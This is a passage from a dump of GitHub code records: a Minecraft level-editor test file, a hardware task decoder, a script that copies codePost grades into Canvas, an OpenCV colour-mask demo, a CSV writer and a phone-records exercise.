-7), (38, 128, 25)) , level.materials.WoodPlanks);\n c = level.getChunk(0, 0)\n assert (c.Blocks == 5).all()\n\n def testReplace(self):\n level = self.alphalevel.level\n\n level.fillBlocks(BoundingBox((-11, 0, -7), (38, 128, 25)) , level.materials.WoodPlanks, [level.materials.Dirt, level.materials.Grass]);\n\n def testSaveRelight(self):\n indevlevel = self.indevlevel.level\n level = self.alphalevel.level\n\n cx, cz = -3, -1;\n\n level.deleteChunk(cx, cz);\n\n level.createChunk(cx, cz);\n level.copyBlocksFrom(indevlevel, BoundingBox((0, 0, 0), (64, 64, 64,)), (-96, 32, 0))\n\n level.generateLights();\n level.saveInPlace();\n\n\nclass TestSchematics(unittest.TestCase):\n def setUp(self):\n #self.alphaLevel = TempLevel(\"Dojo_64_64_128.dat\")\n self.indevlevel = TempLevel(\"hell.mclevel\")\n\n def testCreate(self):\n #info(\"Schematic from indev\")\n\n size = (64, 64, 64)\n schematic = MCSchematic(shape=size, filename=\"hell.schematic\", mats='Classic');\n level = self.indevlevel.level\n schematic.rotateLeft();\n\n self.failUnlessRaises(ValueError, lambda:(\n schematic.copyBlocksFrom(level, BoundingBox((-32, -32, -32), (64, 64, 64,)), (0, 0, 0))\n ))\n\n schematic.copyBlocksFrom(level, BoundingBox((0, 0, 0), (64, 64, 64,)), (0, 0, 0))\n assert((schematic.Blocks[0:64, 0:64, 0:64] == level.Blocks[0:64, 0:64, 0:64]).all())\n schematic.compress();\n\n schematic.copyBlocksFrom(level, BoundingBox((0, 0, 0), 
(64, 64, 64,)), (-32, -32, -32))\n assert((schematic.Blocks[0:32, 0:32, 0:32] == level.Blocks[32:64, 32:64, 32:64]).all())\n\n schematic.compress();\n\n schematic.saveInPlace();\n\n schem = fromFile(\"schematics\\CreativeInABox.schematic\");\n tempSchematic = MCSchematic(shape=(1, 1, 3))\n tempSchematic.copyBlocksFrom(schem, BoundingBox((0, 0, 0), (1, 1, 3)), (0, 0, 0))\n\n info(\"Schematic from alpha\")\n level = loadWorldNumber(1)\n for cx, cz in itertools.product(xrange(0, 4), xrange(0, 4)):\n try:\n level.createChunk(cx, cz)\n except ValueError:\n pass\n schematic.copyBlocksFrom(level, BoundingBox((0, 0, 0), (64, 64, 64,)), (0, 0, 0))\n\n def testINVEditChests(self):\n info(\"INVEdit chest\")\n invFile = fromFile(\"schematics/Chests/TinkerersBox.inv\");\n info(\"Blocks: \", invFile.Blocks)\n info(\"Data: \", invFile.Data)\n info(\"Entities: \", invFile.Entities)\n info(\"TileEntities: \", invFile.TileEntities)\n #raise SystemExit;\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()\n","repo_name":"YRSNorwich/ProjectBlock","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"8261796904","text":"\"\"\"\n This module takes in a task and returns the decoded task\n\n You can instantiate by calling decoder(task_length)\n\n Task structure:\n\n Total - 128 bit\n Supported max DRAM - 4GB\n Min Block Size - 64kB\n Max allocable blocks- 256\n Max allocable Size - 8MB\n\n OPCODE Format for TFUs\n\n [7:0] Acc ID\n [23:8] Input0 memory\n [31:24] Input0 Size\n [47:32] Input1 memory\n [55:48] Input1 Size\n [71:56] Output memory\n [79:72] Output size\n [87:80] Control - Optional\n [95:88] Task ID - Optional\n [99:96] Process ID - Optional\n\n OPCODE Format for CPU\n\n [7:0] Instr ID\n [23:8] src0\n [39:24] src1\n [55:40] dst0\n [63:56] control - Optional\n\n\"\"\"\n\nimport sys\n\nimport accelerators\n\nclass TaskDecode:\n\n def __init__(self, task_len):\n self.task = '0' * task_len\n self.task_len = task_len\n self.task_dict = {}\n self.task_id = 0\n self.task_id_max = 1024*1024\n\n def run_cycle(self, task_tuple):\n task = task_tuple[0]\n task_valid = task_tuple[1]\n\n self.task = str(task)\n flag = False\n\n if(task_valid):\n flag = self.decode()\n\n # Decode success and input was valid\n if(flag):\n return (self.task_dict, 1)\n\n else:\n # Decode failed\n sys.exit(\"Invalid unidentified task: %s\" % (self.task))\n # Input was not valid, return the output valid to be 0\n else:\n return (None, 0)\n\n def decode(self):\n\n # First check whether the instruction format is for CPU/TFU\n instr = accelerators.instr_decode[int(self.task[0:2], 16)]\n\n if(instr in accelerators.iTFU):\n #Since each field is atleast 4 bits, we don't need binary rep\n acc_id = self.task[0:2]\n inp0_mem = self.task[2:10]\n inp0_size = self.task[10:12]\n inp1_mem = self.task[12:20]\n inp1_size = self.task[20:22]\n out_mem = self.task[22:30]\n out_size = self.task[30:32]\n control = self.task[32:34]\n\n #TEMP task id is local\n self.task_id= self.task_id + 1 if ((self.task_id + 1) < self.task_id_max) else 0\n task_id = str(self.task_id)\n\n # populate the task dict\n self.task_dict = {'accelerator' : instr,\n 'inp0_mem' : int(inp0_mem,16),\n 'inp0_size' : int(inp0_size,16),\n 'inp1_mem' : int(inp1_mem,16),\n 'inp1_size' : int(inp1_size,16),\n 'out0_mem' : int(out_mem,16),\n 'out0_size' : int(out_size,16),\n 'task_id' : task_id,\n 'control' : 
int(control,16),\n 'instrType' : 'TFU'\n }\n\n return True\n\n elif(instr in accelerators.iCPU):\n\n src0 = self.task[2:10]\n src1 = self.task[10:18]\n dst0 = self.task[18:26]\n control = self.task[26:28]\n\n #TEMP task id is local\n self.task_id= self.task_id + 1 if ((self.task_id + 1) < self.task_id_max) else 0\n task_id = str(self.task_id)\n\n # populate the task dict\n self.task_dict = {'accelerator' : instr,\n 'src0' : int(src0,16),\n 'src1' : int(src1,16),\n 'dst0' : int(dst0,16),\n 'control' : int(control,16),\n 'task_id' : task_id,\n 'instrType' : 'CPU'\n }\n\n return True\n\n else:\n # Unidentified instruction\n return False\n\nif __name__ == '__main__':\n\n decoder_hts = TaskDecode(16)\n print(decoder_hts.run_cycle(('1000R000R100R200', 1)))\n print(decoder_hts.run_cycle(('1000R000R100R200', 0)))\n print(decoder_hts.run_cycle(('06000000000000000000123123123', 1)))\n","repo_name":"hpu-developers/HPUSim","sub_path":"DUT/task_decode.py","file_name":"task_decode.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"40491512682","text":"\"\"\"\nThis script interfaces with canvas and codepost.io\nto transfer grades of any assignment from codepost.io\ninto the canvas gradebook.\n\nThis is intended to be run once after the conclusion of\nthe grading of an assignment. It will only ever update\ngrades in Canvas if the canvas grade is missing (*and*\nthe --commit option has been provided; otherwise a\nreport of potential actions will be produced). If\ngrades need to be changed after this run, it should be\ndone manually.\n\nTODO: this script is complete, but needs troubleshooting\n\n\"\"\"\nfrom config import config\nfrom course import course\nfrom codepostUtils import get_assignment_id\nfrom canvasUtils import getAssignments\nfrom canvasUtils import getGrade\nfrom canvasUtils import setGrade\nimport argparse\nimport codepost\nimport pprint\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"assignment_name\", help=\n \"\"\"The codePost assignment id to pull scores FROM\n \"\"\")\nparser.add_argument(\"--commit\", action='store_true', help=\n \"\"\"Commmits the changes to the gradebook. If this is not\n provided, the script will run in coward mode and not make\n any modifications, only reporting what would have been done.\n \"\"\")\nargs = parser.parse_args()\n\ncodepost.configure_api_key(config.codepost_api_key)\n\n# alternative:\n# codepost_assignment_id = codepostUtils.get_assignment_id(assignment_name)\nassignment_name = args.assignment_name\ncodepost_assignment_id = get_assignment_id(assignment_name)\nif codepost_assignment_id is None:\n print(f\"Codepost assignment for '{assignment_name}' not found\", file=sys.stderr)\n exit(1)\ncanvas_assignments = getAssignments(name=assignment_name)\nif not canvas_assignments:\n print(f\"Canvas assignment for '{assignment_name}' not found\", file=sys.stderr)\n exit(1)\nelif len(canvas_assignments) > 1:\n print(f\"Multiple Canvas assignments for '{assignment_name}' found!\", file=sys.stderr)\n exit(1)\ncanvas_assignment = canvas_assignments[0]\ncanvas_assignment_id = canvas_assignment.id\ncommit_to_canvas = args.commit\n\nprint(f\"Processing assignment '{assignment_name}' (codepost id={codepost_assignment_id}) to (canvas id={canvas_assignment_id})...\")\nif not commit_to_canvas:\n print(f\"\\t(Coward mode)\")\n\n# 1. 
Request the submissions for an assignment directly\nassignment_submissions = codepost.assignment.list_submissions(id=codepost_assignment_id)\n\n# email (codepost) -> (codepostScore)\n# non-finalized submissions will have a None value\n# no submits will not have a key\ncodepost_grades = {}\n\nfor submission in assignment_submissions:\n submission_id = submission.id\n students = submission.students\n # only the actual submission contains the grade\n the_submission = codepost.submission.retrieve(id=submission_id)\n #grade is only defined if it is finalized, otherwise it is None\n #despite the API docs, it is a float!!\n if not the_submission.isFinalized:\n print(f\"WARNING Submission {students} not finalized!\")\n grade = the_submission.grade\n for student in students:\n codepost_grades[student] = grade\n\n# for each student in roster:\n# retrieve canvas grade\n# report\nfor nuid,p in course.students.items():\n codepost_grade = None if p.canvasEmail not in codepost_grades else codepost_grades[p.canvasEmail]\n canvas_grade = getGrade(canvas_assignment_id, p.canvasId)\n print(f\"{p}:\")\n print(f\" codepost: {codepost_grade}\")\n print(f\" canvas: {canvas_grade}\")\n message = None\n if canvas_grade is not None:\n print(f\" Skipping, Canvas grade exists...\")\n else:\n # change canvas grade...\n if codepost_grade is None:\n log = f\" Updating Canvas grade to 0, No Submission...\"\n score = 0\n comment = \"No Submission\"\n else:\n log = f\" Updating Canvas grade to {codepost_grade}...\"\n score = codepost_grade;\n comment = None\n print(log)\n if commit_to_canvas:\n setGrade(canvas_assignment_id, p.canvasId, score, comment)\n\n#pprint.pprint(codepost_grades)\nif not commit_to_canvas:\n print(\"Cowardly refusing to commit grades to canvas; rerun with --commit if you wanna.\")\n","repo_name":"cbourke/ComputerScienceI","sub_path":"scripts/codepost/codepostToCanvas.py","file_name":"codepostToCanvas.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"96"} +{"seq_id":"33384624193","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\nlower_green = np.array([40, 100, 100])\nupper_green = np.array([100, 255, 255])\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # convert image into gray\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # converts to HSV format\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # detect only green\n mask = cv2.inRange(image, lower_green, upper_green)\n res = cv2.bitwise_and(image, image, mask=mask)\n\n # flip image\n # image = cv2.flip(image,1)\n # Display the resulting frame\n cv2.imshow('frame', res)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"rifa73/Covid19","sub_path":"GreenMask.py","file_name":"GreenMask.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24321061986","text":"import csv\n\ndef write_to_csv(num_senders_desc, msgs_rcvd, both_dict_key):\n \"\"\"\n create a csv of person, sent and received columns\n \"\"\"\n\n file_for_question_1 = open('file_for_question_1.csv', 'w')\n\n with file_for_question_1:\n writer = csv.writer(file_for_question_1, lineterminator='\\n')\n writer.writerow(['person', 'sent', 'received'])\n for key in both_dict_key:\n try:\n # number of messages sent by a sender. 
need this try except clause\n # because the list of keys may have people that have received\n # an email and did not send an email and vice versa\n messages_sent = num_senders_desc[key]\n except:\n messages_sent = 0\n try:\n # number of messages received by a sender\n messages_received = msgs_rcvd[key]\n except:\n messages_received = 0\n\n writer.writerow((key, messages_sent, messages_received))\n\n return None\n","repo_name":"Allen8838/Data-Science-Projects","sub_path":"Red Owl/Modules/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32182670369","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\n\"\"\"\nTASK 1:\nHow many different telephone numbers are there in the records? \nPrint a message:\n\"There are different telephone numbers in the records.\"\n\"\"\"\nunique_text_no = set(i for j in texts for i in j[:2])\nunique_call_no = set(i for j in calls for i in j[:2])\ncount = len(unique_text_no.union(unique_call_no))\nprint(\"There are {} different telephone numbers in the records.\".format(count))","repo_name":"Akshatt/unscramble-computer-science-problems","sub_path":"submit_Project 1/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}